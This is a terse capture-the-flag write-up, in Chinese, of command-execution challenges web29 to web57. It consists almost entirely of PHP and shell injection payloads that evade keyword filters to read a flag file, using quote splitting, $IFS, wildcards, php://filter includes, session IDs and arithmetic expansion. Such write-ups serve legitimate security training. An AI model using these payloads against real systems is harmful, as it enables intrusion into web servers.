命令执行
by Firebasky
web29
echo `nl fl''ag.php`;
查看源代码
web30
echo `nl fl''ag.p''hp`;
查看源代码
web31
show_source(next(array_reverse(scandir(pos(localeconv())))));
c=$a=show_source($_GET[1])?>&1=flag.php
c=eval($_GET[1])?>&1=system('cat flag.php');
c=?><?=`$_GET[1]`;&1=cat flag.php
查看源代码
c=?><?=passthru($_GET[1]);&1=cat flag.php
查看源代码
web32
c=$nice=include$_GET["url"]?>&url=php://filter/read=convert.base64-encode/resource=flag.php
web33-36一样
c=?><?=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
web36把参数换成字母a
web40
show_source(next(array_reverse(scandir(pos(localeconv())))));
GXYCTF的禁止套娃
通过cookie获得参数进行命令执行
c=session_start();system(session_id());
passid=ls
web41
参考羽师傅wp
web42
payload:
cat flag.php%0a
查看源代码
web43
nl flag.php%0a
查看源代码
web44
nl fla*.php%0a
查看源代码
web45
echo$IFS`tac$IFS*`%0A
web46
nl<fla''g.php||
查看源代码
web47-51
和web46一样
web52
nl$IFS/fla''g||
web53
c''at${IFS}fla''g.p''hp
web54
/bin/?at${IFS}f???????
web55
https://blog.csdn.net/qq_46091464/article/details/108513145
https://blog.csdn.net/qq_46091464/article/details/108557067
web56
https://blog.csdn.net/qq_46091464/article/details/108513145
web57
payload:
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))
${_} ="" //返回上一次命令
$((${_}))=0
$((~$((${_}))))=-1